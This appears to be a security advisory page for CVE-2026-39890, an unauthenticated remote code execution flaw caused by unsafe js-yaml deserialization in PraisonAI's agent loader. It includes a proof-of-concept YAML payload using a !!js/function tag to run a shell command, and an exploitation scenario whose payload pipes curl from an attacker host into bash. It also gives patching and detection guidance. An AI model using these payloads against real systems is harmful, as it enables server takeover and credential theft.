AI Threat Alert

CVE-2026-39890: PraisonAI: YAML deserialization enables unauthenticated RCE

GHSA-32vr-5gcf-3pw2 CRITICAL PoC AVAILABLE CISA: ATTEND
Published April 8, 2026
CISO Take

PraisonAI's agent-loading service uses js-yaml's unsafe `load()` function without a safe schema, allowing any attacker to embed executable JavaScript via `!!js/function` tags in a crafted agent definition YAML file — resulting in unauthenticated remote code execution at CVSS 9.8. Any deployment exposing the agent upload endpoint without authentication is fully compromisable on first attempt: the published proof-of-concept requires no AI expertise and is trivially adaptable. AI agent processes routinely hold API keys, database credentials, and broad filesystem access, making server compromise here disproportionately impactful compared to a typical web application RCE. Upgrade immediately to praisonai >= 4.5.115, which patches the issue by switching to `yaml.load()` with `JSON_SCHEMA`; as an interim control, restrict or WAF-block the agent definition upload endpoint until patching is complete.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Critical. CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) means fully network-exploitable with zero authentication and zero user interaction. A working PoC is documented in the public security advisory — exploitation is script-kiddie level. The 9 other CVEs recorded against this package indicate a pattern of security debt. AI agent runtimes typically operate with elevated process privileges and broad tool access, amplifying the blast radius well beyond a conventional web server compromise.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
praisonai pip <= 4.5.114 4.5.115
1 dependents 84% patched ~0d to patch Full package profile →

Do you use praisonai? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
0.6%
chance of exploitation in 30 days
Higher than 68% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

What should I do?

5 steps

  1. Patch immediately: upgrade to praisonai >= 4.5.115 — this is the only complete fix.

  2. If patching is delayed, block the agent definition upload endpoint at the network or WAF layer, or enforce authentication on all agent management APIs.

  3. Audit all YAML parsing in your codebase: search for yaml.load( calls in js-yaml usage lacking { schema: JSON_SCHEMA } or { schema: DEFAULT_SAFE_SCHEMA }.

  4. Scan deployed agent definition files for the presence of !!js/ tags as an indicator of compromise.

  5. Rotate all credentials accessible to the PraisonAI process (API keys, DB passwords, tokens) if exploitation is suspected or confirmed.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Agent Framework AML.T0011.000 AML.T0049 AML.T0072 AML.T0081 AML.T0083

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - AI System Input Controls
NIST AI RMF
MANAGE 2.4 - Residual risks and response actions are monitored and managed
OWASP LLM Top 10
LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2026-39890?

PraisonAI's agent-loading service uses js-yaml's unsafe `load()` function without a safe schema, allowing any attacker to embed executable JavaScript via `!!js/function` tags in a crafted agent definition YAML file — resulting in unauthenticated remote code execution at CVSS 9.8. Any deployment exposing the agent upload endpoint without authentication is fully compromisable on first attempt: the published proof-of-concept requires no AI expertise and is trivially adaptable. AI agent processes routinely hold API keys, database credentials, and broad filesystem access, making server compromise here disproportionately impactful compared to a typical web application RCE. Upgrade immediately to praisonai >= 4.5.115, which patches the issue by switching to `yaml.load()` with `JSON_SCHEMA`; as an interim control, restrict or WAF-block the agent definition upload endpoint until patching is complete.

Is CVE-2026-39890 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-39890, increasing the risk of exploitation.

How to fix CVE-2026-39890?

1. Patch immediately: upgrade to praisonai >= 4.5.115 — this is the only complete fix. 2. If patching is delayed, block the agent definition upload endpoint at the network or WAF layer, or enforce authentication on all agent management APIs. 3. Audit all YAML parsing in your codebase: search for `yaml.load(` calls in js-yaml usage lacking `{ schema: JSON_SCHEMA }` or `{ schema: DEFAULT_SAFE_SCHEMA }`. 4. Scan deployed agent definition files for the presence of `!!js/` tags as an indicator of compromise. 5. Rotate all credentials accessible to the PraisonAI process (API keys, DB passwords, tokens) if exploitation is suspected or confirmed.

What systems are affected by CVE-2026-39890?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, multi-agent orchestration, AI development pipelines, model serving.

What is the CVSS score for CVE-2026-39890?

CVE-2026-39890 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.56%.

Technical Details

NVD Description

## Summary The `AgentService.loadAgentFromFile` method uses the `js-yaml` library to parse YAML files without disabling dangerous tags (such as `!!js/function` and `!!js/undefined`). This allows an attacker to craft a malicious YAML file that, when parsed, executes arbitrary JavaScript code. An attacker can exploit this vulnerability by uploading a malicious agent definition file via the API endpoint, leading to remote code execution (RCE) on the server. ## Details The vulnerability exists in the YAML deserialization process. The `js-yaml` library's `load` function is used without specifying a safe schema (e.g., `JSON_SCHEMA` or `DEFAULT_SAFE_SCHEMA`). This enables the parsing of JavaScript functions and other dangerous types. When a malicious YAML file containing a `!!js/function` tag is parsed, the function is evaluated, leading to arbitrary code execution. The vulnerable code is located in `src/agents/agent.service.ts` at line 55. ## PoC An attacker can create a malicious agent YAML file with the following content: ```yaml !!js/function > function(){ require('child_process').execSync('touch /tmp/pwned') } ``` Then, upload this file as an agent definition via the API endpoint that uses `AgentService.loadAgentFromFile`. When the agent is loaded (either during startup or via an API call that triggers loading), the payload will execute the command `touch /tmp/pwned`, demonstrating arbitrary code execution. ## Impact This vulnerability allows an unauthenticated attacker (if the API endpoint is unprotected) or an authenticated attacker with the ability to upload agent definitions to execute arbitrary code on the server. This can lead to complete compromise of the server, data theft, or further network penetration. ## Recommended Fix Replace the unsafe `load` method with a safe alternative. Specifically, use the `load` method with a safe schema, such as `JSON_SCHEMA` or `DEFAULT_SAFE_SCHEMA`. For example: ```typescript import yaml from 'js-yaml'; import { JSON_SCHEMA } from 'js-yaml'; // In the loadAgentFromFile method const agent = yaml.load(fileContent, { schema: JSON_SCHEMA }); ``` Alternatively, if the application requires only a subset of YAML features, consider using the `safeLoad` method from an older version (though note it was deprecated). The key is to avoid loading tags that can execute code. Additionally, validate and sanitize all user input, especially file uploads. Ensure that agent definition files are only uploaded by trusted users and consider storing them in a secure location with proper access controls.

Exploitation Scenario

An attacker discovers a PraisonAI instance with an unauthenticated agent definition upload endpoint — trivially detectable via Shodan or passive DNS. They craft a YAML payload containing `!!js/function > function(){ require('child_process').execSync('curl http://attacker.com/shell.sh | bash') }` and POST it to the agent upload API. PraisonAI's `loadAgentFromFile` passes this to js-yaml's unsafe `load()`, which evaluates the embedded JavaScript in the Node.js process. The reverse shell callback gives the attacker full server access: they exfiltrate `.env` files containing LLM API keys, database credentials, and access tokens, then pivot laterally into connected enterprise infrastructure using the agent's configured tool access.

Weaknesses (CWE)

CWE-502 Deserialization of Untrusted Data Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published
April 8, 2026
Last Modified
April 9, 2026
First Seen
April 8, 2026

Related Vulnerabilities

CRITICAL GHSA-9qhq-v63v-fv3j 9.8

PraisonAI: RCE via MCP command injection

Same package: praisonai
CRITICAL GHSA-vc46-vw85-3wvm 9.8

PraisonAI: RCE via malicious workflow YAML execution

Same package: praisonai
CRITICAL GHSA-2763-cj5r-c79m 9.7

PraisonAI: RCE via shell injection in agent workflows

Same package: praisonai
CRITICAL CVE-2026-44336 9.6

PraisonAI: MCP path traversal escalates to full RCE

Same package: praisonai
CRITICAL CVE-2026-40154 9.3

PraisonAI: supply chain RCE via unverified template exec

Same package: praisonai
Back to Threat Feed